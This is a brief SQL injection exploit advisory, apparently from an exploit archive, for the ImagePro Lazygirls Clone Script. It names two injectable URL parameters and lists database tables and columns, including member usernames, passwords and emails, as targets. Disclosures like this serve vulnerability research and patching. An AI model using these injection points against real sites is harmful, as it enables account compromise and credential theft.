28 lines
No EOL
762 B
Text
28 lines
No EOL
762 B
Text
# # # # #
|
|
# Exploit Title: ImagePro Lazygirls Clone Script - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 05.04.2017
|
|
# Vendor Homepage: http://bimedia.info/
|
|
# Software: http://bimedia.info/8-2/
|
|
# Demo: http://imagepro.clonedemo.com/
|
|
# Version: N/A
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# #ihsansencan
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?page=31&imageID=[SQL]
|
|
# http://localhost/[PATH]/index.php?page=53&pg_id=[SQL]
|
|
# tc_membergroups:id
|
|
# tc_membergroups:group_name
|
|
# tc_membergroups:admin
|
|
# tc_members:id
|
|
# tc_members:group_id
|
|
# tc_members:username
|
|
# tc_members:password
|
|
# tc_members:email
|
|
# tc_members:join_date
|
|
# # # # # |